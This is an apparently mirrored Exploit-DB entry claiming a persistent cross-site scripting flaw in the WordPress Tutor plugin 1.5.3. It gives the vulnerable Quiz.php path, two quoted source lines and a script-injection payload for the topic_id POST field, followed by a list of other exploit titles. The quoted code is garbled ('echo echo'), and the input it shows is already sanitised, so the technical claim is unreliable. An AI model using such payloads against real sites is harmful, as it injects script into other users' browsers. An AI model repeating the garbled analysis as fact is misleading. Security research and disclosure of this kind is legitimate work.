WordPress Plugin tutor.1.5.3 – Persistent Cross-Site Scripting

Exploit Database
85 阅读

作者： Mehran Feizi

日期： 2020-02-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48059/

#Tile: WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
#Author: mehran feizi
#Category: webapps
#Date: 2020-02-12
#vendor home page: https://wordpress.org/plugins/tutor/

===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id; 
447: $topic_id = sanitize_text_field($_POST['topic_id']); 
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================

last Exploits
WordPress Plugin tutor.1.5.3 – Persistent Cross-Site Scripting的更多信息

Apache Tomcat 9.0.0.M1 – Cross-Site Scripting (XSS)：
EgavilanMedia User Registration & Login System with Admin Panel 1.0 – Persistent Cross-Site Scripting：
Front Door 0.4b – SQL Injection：
RiteCMS 1.0.0 – Multiple Vulnerabilities：
FUXA V.1.1.13-1186 – Unauthenticated Remote Code Execution (RCE)：
TufinOS 2.17 Build 1193 – XML External Entity Injection：
dompdf 0.6.0 beta1 – Remote File Inclusion：
DotItYourself – ‘dot-it-yourself.cgi’ Remote Command Execution：